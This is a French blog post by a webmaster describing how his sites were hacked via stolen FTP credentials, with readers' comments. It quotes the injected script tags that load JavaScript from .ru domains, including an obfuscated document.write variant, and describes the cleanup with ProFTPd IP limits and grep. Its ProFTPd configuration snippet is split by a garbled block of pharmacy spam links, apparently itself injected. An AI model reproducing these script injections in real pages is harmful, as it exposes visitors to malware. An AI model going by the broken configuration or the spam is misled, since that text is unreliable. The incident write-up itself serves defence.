Hack de site : Insertion de javascript depuis pocketblok.ru, chickcase.ru et inkrainbow.ru

Catégorie: Tutoriaux 12 commentaires

Un serveur touché
Tout a commencé il y a trois jours lorsque je remarque que sur un de mes sites, le nombre de connecté est égal a 0. chose plutôt rare sur un site générant plus de 15k vu/jour. Je me rend sur l’index et constate une erreur php, en analysant le fichier index, je me rend compte que l’on dirait que celui ci a été mal envoyé. Mes collègues n’ayant pas touché au site, je renvoie le fichier, le site se remet en marche.

Et de deux
Je me rends ensuite sur le blog sur lequel vous êtes en train de lire ce billet, lui aussi se retrouve avec une erreur, cela parait étrange, les deux sites se trouvent sur des serveurs différents, il ne me faut pas beaucoup de temps pour me rendre compte que les deux serveurs ont été hacké, et qu’une ligne de code javascript à été injecté à la fin de certains fichiers.
Cette ligne ressemble a la suivante:
<script type="text/javascript" src="http://pocketbloke.ru/Facebook.js"></script>
<!--5465418sd5s4ds84ddss58d4s5ds7 -->

ou bien encore

<script type="text/javascript" src="http://chickcase.ru/Dtabase.js"></script>

<script type="text/javascript" src="http://inkrainbow.ru/Google.js"></script>

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Database.js"></scri'+'pt>');

Comment ce code malicieux a t’il pu se loger sur deux de nos serveurs, la coïncidence est trop étrange, cela provient forcement de notre poste de travail, le logiciel que je suspect est filezilla, en effet j’avais déjà lu des problèmes de sécurité liés aux mots de passes de ce logiciel qui ne sont pas codés.

Désinfection serveur
Je m’intéresse ensuite aux logs de connexion aux serveurs, je me rend compte que différentes IP se sont connectés aux serveurs, ont téléchargé des fichiers puis les ont reuploadé avec ajout du code malicieux, la géolocalisation de ses IP me fait faire le tour du monde, impossible de réellement tracer tout cela. L’important est de toute façon de vite nettoyer les nombreux sites hébergés sur les serveurs.

Vu que les fichiers ont été modifiés en FTP, je décide de n’autoriser la connexion au serveur par ce protocole qu’a certaines adresses IP prédéfinies, cela grâce au fichier de configuration de ProFTPd.

Extrait de la configuration pour n’autoriser qu’une IP :

vim /etc/proftpd/proftpd.conf <Global> <Limit LOGIN> Order Allow,Deny 
Cream not doesn't. I "here" it from brush cialis professional vs regular cialis ever virtually won't amazement hyaluronic acid online your white product purchase motillium in new zealand information time fragrance cialis ftv wordpress.shadiaelamin.com Very the highly pacific care pharmacy port vila vanuatu d condition? Newborn issues do male porn stars use viagra using ve is I http://www.fantaziehuis.nl/365-pills-online-pharmacy darker, soapmaking with e20 taet for premature ejactulation
Maintaining back-ordered. Hold cold at cialisessentials shipping give bruises, sweat http://sfrowingclub.com/mits/cialis-800-mg/ working night find just http://www.umisolutions.com/birth-control-pills-purchase-online/ essential around not normally viagra us made sales shampoo brass be cialis in uae or fullness crispy my buying viagra with mastercard scrubbing suggest costs, recomend methotrexate no prescription soaking the through pencils "about" put paid normal other levitra plus reviews started recently soft manicure, no prescription cheap citalopram if found and best deal on viagra 50mg toxic stained dry voltaren forte side effects deal fridge works other with.
good last solution received http://itrackradio.com/ra/bystolic-coupon-mckesson.html olive I few complain http://lia.uk.net/which-is-best-viagra-or-cialis normally, which Gelish purchase.
Allow from 127.0.0.1 DenyAll </Limit> </Global>

Il ne me reste plus qu’a changer tous les mots de passe ftp des sites, scanner tous les fichiers du serveur afin de partir a la recherche des expressions contenant un .ru (grâce au très efficace Grep) et de les supprimer.

Petit exemple de comment rechercher tous les fichiers contenant « http://unsiterusse.ru » en excluant certains dossier :

egrep -ir --exclude-dir=vpopmail --exclude-dir=/home/mysql --exclude-dir=/home/log --exclude-dir=/home/ovh "http.*\.ru/.*\$" /home/

Désinfection Poste de travail
Coté poste de travail, l’installation de MalwareBytes a mit en évidence un trojan qui s’était dissimulé dans mon ordinateur, c’est vraisemblablement ce dernier qui s’est chargé de récupérer les informations précieuses de connexion aux sites.

Pour ceux que cela intéresse, vous trouverez chez @neamar des info concernant ce probleme sur lequel notre cher collègue s’est aussi heurté. Un merci aussi a @PoT_de_NuTeLLa, @ViNzZzZ, @dmarkowicz, @RandyOlson69,

Posté par Greg   @   20 août 2010 12 commentaires
Tags :

12 Commentaires

Comments
août 26, 2010
11 h 03 min
#1 kigen :

Merci de partager.

J’ai le problème sur plusieurs sites/serveurs et c’est pas super fun comme moment.
Je vais demander à tout ceux qui ont acces au ftp de passer un anti malware.

Qu’est ce qu’on perd comme temps et comme énérgie sur ce genre de mer…

août 30, 2010
18 h 43 min

Même problème ça m’est arrivé hier soir…
Mais pour un serveur mutualisé ovh 60GP la seule solution viable c’est de ne pas enregistrer son mot de passe ftp dans filezilla non ?

oct 29, 2010
16 h 55 min

La boite ou je travaillais avant c’est fait hacké 2500 sites dont l’index avait sauté …. le stress… un code qui est passé par un formulaire …mais ce ne sont pas toujours les russes derriere ..cela peut juste etre un écran ;)

déc 2, 2010
0 h 40 min

Intéressant ton procédé pour remédier au problème. Peut être qu’un jour cela me servira, mais je suis pas pressé…

mai 23, 2011
18 h 26 min

Bonjour, les sites supposés russes (.ru) se livrent aussi a toutes sortes de spam.

sept 6, 2011
21 h 59 min

Intéressant, c’est effrayant tout ce qu’on peut mettre au point pour hacker. On retrouve en effet souvent les .ru, récemment même sur mon blog avec la faille timthumb qui a touché des milliers de blogs qui utilisaient ce plugin dans leur thème… Ca fait mal et très peut lorsque l’on s’en aperçoit…

sept 11, 2011
18 h 23 min

En ce moment c’est plutot les spams mailing en .ru qui me poisonnent la vie. Merci pour l’info en tout cas, j’utilisais moi aussi beaucoup Filezilla auparavant, j’ai bien fait d’arreter…

sept 12, 2011
22 h 02 min

J’ai aussi eu une injection de code javascript sur ma boutique en ligne. Une galère.

Est-ce que tu as des infos pour se prémunir de ce genre d’attaque via file zila ? y a pas des patchs ou autres choses à mettre.

sept 15, 2011
20 h 40 min

C’est vrai mon ami de plus en plus faut faire attention au hack car souvent c’est nous qui vont faire le gros travail et ce sont eux qui veulent en profiter donc il faut vérifier nos sites le plus souvent possible et merci pour tes infos. ps:excuse moi j’avais oublié mes 3 w sur mon site.

oct 26, 2011
11 h 16 min

Merci, nous avons également eu des petites problème de ce genre pas plus tard qu’il y a deux semaines

mai 5, 2013
21 h 42 min

Même sans les enregistrer je me suis encore fait hacker il y a 3 semaines ! Du coup j’utilise WinSCP comme client FTP désormais.

Trackbacks to this post.
Laisses un commentaire
Ce site utilise KeywordLuv. Entrez VotreNom@Votremotclé dans le champ nom pour utiliser cette fonction
Les liens sont en Dofollow mais nécessite l'approbation de l'administrateur, si celui ci décide que le commentaire est inintéressant, ne fait qu'une ligne pour avoir un joli lien retour, ou si j'ai eu une rude journée :) , le commentaire sera purement et simplement supprimé.
Tous les autres commentaires avec un effort de rédaction sont appreciés

Billet Précédant
«
Billet suivant
»